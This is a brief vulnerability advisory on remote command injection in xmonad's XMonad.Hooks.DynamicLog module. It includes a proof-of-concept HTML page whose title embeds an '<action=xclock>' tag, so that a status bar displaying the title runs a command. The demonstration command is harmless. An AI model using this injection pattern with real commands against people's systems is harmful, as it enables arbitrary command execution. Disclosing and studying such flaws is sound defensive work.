source: http://www.securityfocus.com/bid/61491/info

XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities.

Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. 

<html>
<head>
<title><action=xclock>An innocent title</action></title>
</head>
<body>
<h1>Good bye, cruel world</h1>
</body>
</html>

